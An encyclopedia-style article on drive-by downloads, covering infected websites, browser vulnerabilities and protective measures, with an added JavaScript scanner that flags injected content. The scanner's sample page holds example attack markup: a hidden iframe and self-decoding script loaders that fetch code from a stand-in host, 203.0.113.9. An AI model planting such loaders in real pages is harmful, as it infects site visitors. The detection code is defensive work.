Drive-by-Download

A drive-by download is the unconscious (English drive-by: in passing) and unintended download of software onto a user's computer. The term is used above all for the unwanted download of malicious software that is triggered merely by visiting a web page crafted for that purpose. Such attacks exploit vulnerabilities in the browser, because by design HTML content and browser scripting languages cannot reach anything outside the browser environment.

Manipulation of web pages

In many cases the attackers manipulate websites without the knowledge of their operators, for example by exploiting known vulnerabilities in popular web applications. Merely visiting such a site, without any further action by the user, is then enough for the malware to be downloaded to the user's computer automatically (and silently).
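As an added example (not part of the original article), the following script scans a page's HTML for the kinds of injected content typically planted on a compromised site to launch drive-by downloads: iframes the visitor cannot see, obfuscated inline scripts, and script tags that load from a host other than the site's own. The sample page, the host name example-shop.test, the address 203.0.113.9 and the heuristics themselves are assumptions made for this illustration. It is a static check that never executes any of the page's scripts, and it is meant as a triage aid for site operators, not as a complete detector.

```javascript
// Added example, not code from the original article. Heuristic scan of a
// page's HTML for content typically injected into a compromised site.
// The sample page, host name and thresholds below are constructed assumptions.

const SAMPLE_HTML = `<!DOCTYPE html>
<html><head><title>Shop</title>
<script src="/static/app.js"></script>
</head><body>
<h1>Welcome</h1>
<iframe src="http://203.0.113.9/ld.php" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2F203.0.113.9%2Fx.js%22%3E%3C%2Fscript%3E'));</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41));</script>
<script src="http://203.0.113.9/x.js"></script>
<script src="https://cdn.example-shop.test/lib.js"></script>
</body></html>`;

// Read one attribute value out of a single tag string (double, single or unquoted).
function attr(tag, name) {
  const re = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i');
  const m = re.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// A script source counts as first-party when it resolves to the site's host
// or one of its subdomains; relative URLs resolve against the site itself.
function isFirstParty(src, siteHost) {
  let host;
  try {
    host = new URL(src, `https://${siteHost}/`).hostname;
  } catch {
    return false;
  }
  return host === siteHost || host.endsWith(`.${siteHost}`);
}

// Returns a list of { kind, evidence } findings in document order
// (all iframes first, then all script tags).
function scanForInjections(html, siteHost) {
  const findings = [];

  // 1. iframes the visitor cannot see: zero-sized or hidden via CSS.
  for (const m of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const tag = m[0];
    const style = (attr(tag, 'style') || '').toLowerCase();
    const zeroSized = ['width', 'height'].some(
      (n) => /^0(px)?$/.test((attr(tag, n) || '').trim())
    );
    const hidden = /display\s*:\s*none|visibility\s*:\s*hidden/.test(style);
    if (zeroSized || hidden) {
      findings.push({ kind: 'hidden-iframe', evidence: attr(tag, 'src') || tag });
    }
  }

  // 2. script tags: off-site sources, and inline bodies that decode
  //    themselves at runtime (a common way to hide an injected loader).
  for (const m of html.matchAll(/<script\b([^>]*)>([\s\S]*?)<\/script>/gi)) {
    const [, attrs, body] = m;
    const src = attr(`<script ${attrs}>`, 'src');
    if (src) {
      if (!isFirstParty(src, siteHost)) {
        findings.push({ kind: 'third-party-script', evidence: src });
      }
      continue;
    }
    const obfuscated =
      /\b(eval|document\.write)\s*\(/.test(body) &&
      /\b(unescape|String\.fromCharCode)\s*\(/.test(body);
    if (obfuscated) {
      findings.push({ kind: 'obfuscated-inline-script', evidence: body.trim().slice(0, 60) });
    }
  }
  return findings;
}

console.log(JSON.stringify(scanForInjections(SAMPLE_HTML, 'example-shop.test'), null, 2));
```

On the constructed sample this reports four findings: the hidden iframe, the two self-decoding inline scripts, and the script loaded from 203.0.113.9; the site's own scripts, including the one on its cdn subdomain, are not flagged. A legitimate page may of course use third-party scripts, so that finding is a prompt to compare against the site's known dependencies rather than proof of compromise.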

Dissemination

IT security companies report that a large number of websites are infected with malicious software. Use of this method has been increasing constantly since 2007, and it has now supplanted e-mail as the main distribution channel for malware. Several thousand newly affected sites are reportedly added every day.

Technology

Today web pages often contain dynamic functions implemented with client-side technologies such as JavaScript (also as part of AJAX), Java and Adobe Flash. These techniques allow continuous communication between browser and server without the user having to do anything. This is used, among other things, to rotate advertising banners, to load lists, or to send data to the server. Normally these actions are executed within a sandbox in the browser. Only if the browser has a vulnerability can software escape this sandbox and access the user's computer directly. In that case malicious software can travel from the server to the browser without any user action and, through the browser vulnerability, reach the user's computer.

Protection

To protect against accidental drive-by downloads it helps to always use the current version of the browser and to keep plug-ins such as Adobe Flash and Adobe Reader up to date, or to disable them. In some cases, especially in a corporate environment, these scripting languages can be switched off or filtered at the IT administration level. Disabling the Java plug-in, not installing it in the first place, or at least keeping it current also reduces the likelihood of infection considerably.

Another measure is browser plug-ins that allow scripts to run only after approval by the user, such as NoScript or Flashblock for Firefox. Users of Google Chrome and Opera can use the browser plug-in NotScript.

Another option is to run the browser or e-mail program in a sandbox. A sandbox is a defined storage area to which all output of the program running inside it is written. Copying anything out of it to other parts of the system requires a deliberate action by the user, so unwanted changes are unlikely.

A similar effect is achieved by running programs under a different user account, such as "guest", whose access rights are limited to a narrow range. Under Windows this can be done via "Run as..." in the context menu or from the command line with the "runas" command. If an infection occurs, it is sufficient to delete the account and create it anew.
